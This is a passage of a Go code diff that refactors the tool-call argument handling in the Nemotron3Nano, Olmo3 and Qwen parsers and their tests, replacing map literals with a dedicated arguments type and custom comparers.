toolCall.Function.Name = fnMatch[1]
|
toolCall.Function.Name = fnMatch[1]
|
||||||
|
|
||||||
// Extract parameters
|
// Extract parameters
|
||||||
toolCall.Function.Arguments = make(api.ToolCallFunctionArguments)
|
toolCall.Function.Arguments = api.NewToolCallFunctionArguments()
|
||||||
paramMatches := nemotronParameterRegex.FindAllStringSubmatch(content, -1)
|
paramMatches := nemotronParameterRegex.FindAllStringSubmatch(content, -1)
|
||||||
for _, match := range paramMatches {
|
for _, match := range paramMatches {
|
||||||
if len(match) >= 3 {
|
if len(match) >= 3 {
|
||||||
|
|
@ -233,7 +233,7 @@ func (p *Nemotron3NanoParser) parseToolCall(content string) (api.ToolCall, error
|
||||||
paramValue := strings.TrimSpace(match[2])
|
paramValue := strings.TrimSpace(match[2])
|
||||||
|
|
||||||
// Try to parse as typed value based on tool definition
|
// Try to parse as typed value based on tool definition
|
||||||
toolCall.Function.Arguments[paramName] = p.parseParamValue(paramName, paramValue)
|
toolCall.Function.Arguments.Set(paramName, p.parseParamValue(paramName, paramValue))
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -244,9 +244,11 @@ func (p *Nemotron3NanoParser) parseParamValue(paramName string, raw string) any
|
||||||
// Find the matching tool to get parameter type
|
// Find the matching tool to get parameter type
|
||||||
var paramType api.PropertyType
|
var paramType api.PropertyType
|
||||||
for _, tool := range p.tools {
|
for _, tool := range p.tools {
|
||||||
if prop, ok := tool.Function.Parameters.Properties[paramName]; ok {
|
if tool.Function.Parameters.Properties != nil {
|
||||||
paramType = prop.Type
|
if prop, ok := tool.Function.Parameters.Properties.Get(paramName); ok {
|
||||||
break
|
paramType = prop.Type
|
||||||
|
break
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -51,7 +51,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -65,7 +65,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "NYC"},
|
Arguments: testArgs(map[string]any{"city": "NYC"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -78,10 +78,10 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "book_flight",
|
Name: "book_flight",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"from": "SFO",
|
"from": "SFO",
|
||||||
"to": "NYC",
|
"to": "NYC",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -95,13 +95,13 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "San Francisco"},
|
Arguments: testArgs(map[string]any{"city": "San Francisco"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "New York"},
|
Arguments: testArgs(map[string]any{"city": "New York"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -115,7 +115,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -130,7 +130,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "search",
|
Name: "search",
|
||||||
Arguments: map[string]any{"query": "test"},
|
Arguments: testArgs(map[string]any{"query": "test"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -143,7 +143,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "create_note",
|
Name: "create_note",
|
||||||
Arguments: map[string]any{"content": "Line 1\nLine 2\nLine 3"},
|
Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -165,7 +165,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
name: "tool call with no function name - returns empty tool call",
|
name: "tool call with no function name - returns empty tool call",
|
||||||
input: "<tool_call>\n<function=>\n</function>\n</tool_call>",
|
input: "<tool_call>\n<function=>\n</function>\n</tool_call>",
|
||||||
thinkValue: nil,
|
thinkValue: nil,
|
||||||
expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: nil}}},
|
expectedCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "", Arguments: api.NewToolCallFunctionArguments()}}},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "content with newlines preserved",
|
name: "content with newlines preserved",
|
||||||
|
|
@ -194,7 +194,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "set_temp",
|
Name: "set_temp",
|
||||||
Arguments: map[string]any{"value": "42"},
|
Arguments: testArgs(map[string]any{"value": "42"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -226,7 +226,7 @@ func TestNemotron3NanoParser(t *testing.T) {
|
||||||
if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
|
if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
|
||||||
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
if diff := cmp.Diff(calls, tt.expectedCalls); diff != "" {
|
if diff := cmp.Diff(calls, tt.expectedCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -276,7 +276,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -290,7 +290,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "NYC"},
|
Arguments: testArgs(map[string]any{"city": "NYC"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -302,7 +302,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "test",
|
Name: "test",
|
||||||
Arguments: map[string]any{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -329,10 +329,10 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "book_flight",
|
Name: "book_flight",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"from": "SFO",
|
"from": "SFO",
|
||||||
"to": "NYC",
|
"to": "NYC",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -347,7 +347,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "search",
|
Name: "search",
|
||||||
Arguments: map[string]any{"query": "test query"},
|
Arguments: testArgs(map[string]any{"query": "test query"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -367,13 +367,13 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "San Francisco"},
|
Arguments: testArgs(map[string]any{"city": "San Francisco"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "New York"},
|
Arguments: testArgs(map[string]any{"city": "New York"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -386,7 +386,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "create_note",
|
Name: "create_note",
|
||||||
Arguments: map[string]any{"content": "Line 1\nLine 2\nLine 3"},
|
Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -413,7 +413,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "test",
|
Name: "test",
|
||||||
Arguments: map[string]any{},
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -426,7 +426,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "test",
|
Name: "test",
|
||||||
Arguments: map[string]any{"name": ""},
|
Arguments: testArgs(map[string]any{"name": ""}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -473,7 +473,7 @@ func TestNemotron3NanoParser_Streaming(t *testing.T) {
|
||||||
if diff := cmp.Diff(allThinking, tt.expectedThinking); diff != "" {
|
if diff := cmp.Diff(allThinking, tt.expectedThinking); diff != "" {
|
||||||
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
if diff := cmp.Diff(allCalls, tt.expectedCalls); diff != "" {
|
if diff := cmp.Diff(allCalls, tt.expectedCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -537,9 +537,9 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}},
|
"city": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -548,7 +548,7 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
|
||||||
p := &Nemotron3NanoParser{}
|
p := &Nemotron3NanoParser{}
|
||||||
returnedTools := p.Init(tools, nil, nil)
|
returnedTools := p.Init(tools, nil, nil)
|
||||||
|
|
||||||
if diff := cmp.Diff(returnedTools, tools); diff != "" {
|
if diff := cmp.Diff(returnedTools, tools, toolsComparer); diff != "" {
|
||||||
t.Errorf("tools mismatch (-got +want):\n%s", diff)
|
t.Errorf("tools mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -563,12 +563,12 @@ func TestNemotron3NanoParser_WithTools(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(calls, expectedCalls); diff != "" {
|
if diff := cmp.Diff(calls, expectedCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -242,8 +242,8 @@ func parseOlmo3SingleFunctionCall(s string) (api.ToolCall, error) {
|
||||||
|
|
||||||
// parseOlmo3Arguments parses comma-separated key=value pairs
|
// parseOlmo3Arguments parses comma-separated key=value pairs
|
||||||
// Handles nested parentheses, brackets, braces, and quoted strings
|
// Handles nested parentheses, brackets, braces, and quoted strings
|
||||||
func parseOlmo3Arguments(s string) (map[string]any, error) {
|
func parseOlmo3Arguments(s string) (api.ToolCallFunctionArguments, error) {
|
||||||
args := make(map[string]any)
|
args := api.NewToolCallFunctionArguments()
|
||||||
s = strings.TrimSpace(s)
|
s = strings.TrimSpace(s)
|
||||||
if s == "" {
|
if s == "" {
|
||||||
return args, nil
|
return args, nil
|
||||||
|
|
@ -261,7 +261,7 @@ func parseOlmo3Arguments(s string) (map[string]any, error) {
|
||||||
// Find the first = sign
|
// Find the first = sign
|
||||||
eqIdx := strings.Index(part, "=")
|
eqIdx := strings.Index(part, "=")
|
||||||
if eqIdx == -1 {
|
if eqIdx == -1 {
|
||||||
return nil, fmt.Errorf("invalid argument format: %s", part)
|
return api.ToolCallFunctionArguments{}, fmt.Errorf("invalid argument format: %s", part)
|
||||||
}
|
}
|
||||||
|
|
||||||
key := strings.TrimSpace(part[:eqIdx])
|
key := strings.TrimSpace(part[:eqIdx])
|
||||||
|
|
@ -269,10 +269,10 @@ func parseOlmo3Arguments(s string) (map[string]any, error) {
|
||||||
|
|
||||||
value, err := parseOlmo3Value(valueStr)
|
value, err := parseOlmo3Value(valueStr)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("failed to parse value for %s: %w", key, err)
|
return api.ToolCallFunctionArguments{}, fmt.Errorf("failed to parse value for %s: %w", key, err)
|
||||||
}
|
}
|
||||||
|
|
||||||
args[key] = value
|
args.Set(key, value)
|
||||||
}
|
}
|
||||||
|
|
||||||
return args, nil
|
return args, nil
|
||||||
|
|
|
||||||
|
|
@ -28,7 +28,7 @@ func TestOlmo3Parser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "San Francisco"},
|
Arguments: testArgs(map[string]any{"location": "San Francisco"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -41,7 +41,7 @@ func TestOlmo3Parser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "NYC"},
|
Arguments: testArgs(map[string]any{"location": "NYC"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -53,11 +53,11 @@ func TestOlmo3Parser(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "book_flight",
|
Name: "book_flight",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"from": "SFO",
|
"from": "SFO",
|
||||||
"to": "NYC",
|
"to": "NYC",
|
||||||
"date": "2024-01-15",
|
"date": "2024-01-15",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -70,13 +70,13 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "San Francisco"},
|
Arguments: testArgs(map[string]any{"location": "San Francisco"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "New York"},
|
Arguments: testArgs(map[string]any{"location": "New York"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -88,7 +88,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "set_temperature",
|
Name: "set_temperature",
|
||||||
Arguments: map[string]any{"value": int64(72)},
|
Arguments: testArgs(map[string]any{"value": int64(72)}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -100,7 +100,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "set_price",
|
Name: "set_price",
|
||||||
Arguments: map[string]any{"amount": 19.99},
|
Arguments: testArgs(map[string]any{"amount": 19.99}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -112,7 +112,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "toggle_setting",
|
Name: "toggle_setting",
|
||||||
Arguments: map[string]any{"enabled": true},
|
Arguments: testArgs(map[string]any{"enabled": true}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -124,7 +124,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "clear_value",
|
Name: "clear_value",
|
||||||
Arguments: map[string]any{"field": nil},
|
Arguments: testArgs(map[string]any{"field": nil}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -136,7 +136,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "process_items",
|
Name: "process_items",
|
||||||
Arguments: map[string]any{"items": []any{"apple", "banana", "cherry"}},
|
Arguments: testArgs(map[string]any{"items": []any{"apple", "banana", "cherry"}}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -148,12 +148,12 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "update_config",
|
Name: "update_config",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"settings": map[string]any{
|
"settings": map[string]any{
|
||||||
"theme": "dark",
|
"theme": "dark",
|
||||||
"fontSize": int64(14),
|
"fontSize": int64(14),
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -165,7 +165,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "create_request",
|
Name: "create_request",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"data": map[string]any{
|
"data": map[string]any{
|
||||||
"user": map[string]any{
|
"user": map[string]any{
|
||||||
"name": "John",
|
"name": "John",
|
||||||
|
|
@ -173,7 +173,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
},
|
},
|
||||||
"active": true,
|
"active": true,
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -185,7 +185,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_current_time",
|
Name: "get_current_time",
|
||||||
Arguments: map[string]any{},
|
Arguments: testArgs(map[string]any{}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -197,7 +197,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "search",
|
Name: "search",
|
||||||
Arguments: map[string]any{"query": "hello world"},
|
Arguments: testArgs(map[string]any{"query": "hello world"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -209,7 +209,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "search",
|
Name: "search",
|
||||||
Arguments: map[string]any{"query": `say "hello"`},
|
Arguments: testArgs(map[string]any{"query": `say "hello"`}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -221,11 +221,11 @@ get_weather(location="New York")</function_calls>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "create_user",
|
Name: "create_user",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"name": "John",
|
"name": "John",
|
||||||
"age": int64(30),
|
"age": int64(30),
|
||||||
"active": true,
|
"active": true,
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -257,7 +257,7 @@ get_weather(location="New York")</function_calls>`,
|
||||||
if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
|
if diff := cmp.Diff(thinking, tt.expectedThinking); diff != "" {
|
||||||
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
t.Errorf("thinking mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
if diff := cmp.Diff(calls, tt.expectedCalls); diff != "" {
|
if diff := cmp.Diff(calls, tt.expectedCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -283,7 +283,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "SF"},
|
Arguments: testArgs(map[string]any{"location": "SF"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -296,7 +296,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "NYC"},
|
Arguments: testArgs(map[string]any{"location": "NYC"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -308,7 +308,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "test",
|
Name: "test",
|
||||||
Arguments: map[string]any{},
|
Arguments: testArgs(map[string]any{}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -343,7 +343,7 @@ func TestOlmo3Parser_Streaming(t *testing.T) {
|
||||||
if diff := cmp.Diff(allContent, tt.expectedContent); diff != "" {
|
if diff := cmp.Diff(allContent, tt.expectedContent); diff != "" {
|
||||||
t.Errorf("content mismatch (-got +want):\n%s", diff)
|
t.Errorf("content mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
if diff := cmp.Diff(allCalls, tt.expectedCalls); diff != "" {
|
if diff := cmp.Diff(allCalls, tt.expectedCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -378,7 +378,7 @@ func TestParseOlmo3FunctionCalls(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "SF"},
|
Arguments: testArgs(map[string]any{"location": "SF"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -390,11 +390,11 @@ func TestParseOlmo3FunctionCalls(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "send_email",
|
Name: "send_email",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"to": "user@example.com",
|
"to": "user@example.com",
|
||||||
"subject": "Hello",
|
"subject": "Hello",
|
||||||
"body": "Test message",
|
"body": "Test message",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -407,13 +407,13 @@ get_time(timezone="PST")`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"location": "SF"},
|
Arguments: testArgs(map[string]any{"location": "SF"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_time",
|
Name: "get_time",
|
||||||
Arguments: map[string]any{"timezone": "PST"},
|
Arguments: testArgs(map[string]any{"timezone": "PST"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -437,7 +437,7 @@ get_time(timezone="PST")`,
|
||||||
t.Errorf("parseOlmo3FunctionCalls() error = %v, wantErr %v", err, tt.wantErr)
|
t.Errorf("parseOlmo3FunctionCalls() error = %v, wantErr %v", err, tt.wantErr)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
if diff := cmp.Diff(calls, tt.expected); diff != "" {
|
if diff := cmp.Diff(calls, tt.expected, argsComparer); diff != "" {
|
||||||
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
t.Errorf("calls mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
|
||||||
|
|
@ -270,12 +270,12 @@ func parseToolCall(raw qwenEventRawToolCall, tools []api.Tool) (api.ToolCall, er
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
toolCall.Function.Arguments = make(api.ToolCallFunctionArguments)
|
toolCall.Function.Arguments = api.NewToolCallFunctionArguments()
|
||||||
for _, parameter := range functionCall.Parameters {
|
for _, parameter := range functionCall.Parameters {
|
||||||
// Look up the parameter type if we found the tool
|
// Look up the parameter type if we found the tool
|
||||||
var paramType api.PropertyType
|
var paramType api.PropertyType
|
||||||
if matchedTool != nil && matchedTool.Function.Parameters.Properties != nil {
|
if matchedTool != nil && matchedTool.Function.Parameters.Properties != nil {
|
||||||
if prop, ok := matchedTool.Function.Parameters.Properties[parameter.Name]; ok {
|
if prop, ok := matchedTool.Function.Parameters.Properties.Get(parameter.Name); ok {
|
||||||
// Handle anyOf by collecting all types from the union
|
// Handle anyOf by collecting all types from the union
|
||||||
